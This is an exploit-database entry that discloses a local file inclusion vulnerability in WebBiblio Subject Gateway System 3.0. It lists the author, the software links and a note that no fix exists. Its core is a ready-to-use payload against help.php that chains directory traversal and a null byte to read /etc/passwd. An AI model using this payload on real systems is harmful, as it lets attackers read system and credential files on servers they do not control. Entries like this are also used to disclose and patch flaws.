WebBiblio Subject Gateway System v3.0 LFI Vulnerability

2010-06-07 14:02:00

# Exploit Title:
WebBiblio Subject Gateway System Local File Inclusion Vulnerability

# Date:
June 06 2010

# Author:
AntiSecurity

# Software Link:
http://webbiblio.sourceforge.net/
http://sourceforge.net/projects/webbiblio/files/

# Version:
WebBiblio version 3.0

# Tested on:
Linux

# Target:
http://server/shared/help.php?page=../../../../../../../../../../../../../../../etc/passwd%00

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.